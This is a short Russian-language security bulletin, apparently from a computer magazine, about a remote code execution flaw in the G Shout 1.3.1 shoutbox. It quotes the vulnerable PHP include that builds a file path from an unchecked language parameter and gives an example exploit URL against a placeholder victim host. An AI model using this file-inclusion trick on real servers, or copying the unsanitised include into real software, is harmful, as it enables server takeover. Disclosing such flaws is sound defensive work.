Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в G Shout.
Компьютер для продвинутых
пользователей
В этом выпуске:
G Shout
ПО: G Shout
Версия: 1.3.1
Уязвимость:
Возможность выполнения кода на сервере.
Листинг: include("config.php");
include("./includes/functions.inc.php");
include ("./languages/lang-".$language.".php"); Использование: http://www.victim.com/G Shout/shoutbox.php?language=Command-Shell